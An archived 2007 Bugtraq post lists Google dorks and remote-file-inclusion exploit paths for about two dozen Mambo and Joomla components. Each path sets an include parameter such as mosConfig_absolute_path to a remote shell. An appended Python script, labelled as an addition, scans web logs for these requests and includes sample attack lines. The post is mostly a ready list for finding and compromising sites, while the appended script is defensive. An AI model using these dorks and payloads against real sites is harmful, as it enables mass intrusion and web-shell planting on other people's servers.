Message-ID: <20070622093626.24035.qmail@securityfocus.com>
Date: 22 Jun 2007 09:36:26 -0000
From: spymeta@...oo.com
To: bugtraq@...urityfocus.com
Subject: All Of the Mambo & Joomla Script Remote File Inclusion Bugs..

Hi everybody...
There are some Remote File Inclusion bugs in Mambo & Joomla scripts...

You can search, e.g. inurl:[Dork], [dork], allinurl:[dork], on Google or other search sites.


Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

Expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

by SPYMETA

Mail & MSN : spymeta@...oo.com
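
As an added example (not part of the original post), here is a log check a site operator could run for the request pattern listed above. It generalizes from the listed scripts to any request that sets one of the post's include-path parameters to a remote URL; the log lines, addresses and the name `find_rfi_attempts` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path parameters named in the post above.
RFI_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site",
              "absolute_path", "phpbb_root_path", "sbp"}
# A value starting with "scheme://" or "//" points the include at another host.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Client address, request target and status from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jun/2007:09:40:01 +0000] "GET /components/com_sitemap/'
    'sitemap.xml.php?mosConfig_absolute_path=http://192.0.2.10/x.txt? HTTP/1.0" 200 512',
    '203.0.113.5 - - [22/Jun/2007:09:40:02 +0000] "GET /modules/mod_calendar.php'
    '?absolute_path=http%3A%2F%2F192.0.2.10%2Fx.txt HTTP/1.0" 404 210',
    '198.51.100.7 - - [22/Jun/2007:09:41:10 +0000] "GET /index.php'
    '?option=com_sitemap&Itemid=5 HTTP/1.1" 200 8841',
    '198.51.100.7 - - [22/Jun/2007:09:41:12 +0000] "GET /components/com_forum/'
    'download.php?id=3 HTTP/1.1" 200 1337',
]

def find_rfi_attempts(lines):
    """Return (client, path, parameter, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in RFI_PARAMS and REMOTE_VALUE.match(value):
                hits.append((client, url.path, name, int(status)))
    return hits

if __name__ == "__main__":
    for client, path, name, status in find_rfi_attempts(SAMPLE_LOG):
        # A 200 on such a request deserves a closer look than a 404.
        print(f"{client} set {name} to a remote URL on {path} (HTTP {status})")
```

None of these parameters has a legitimate reason to arrive in a query string, so a hit on a script that answered 200 is worth checking against the installed component list.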
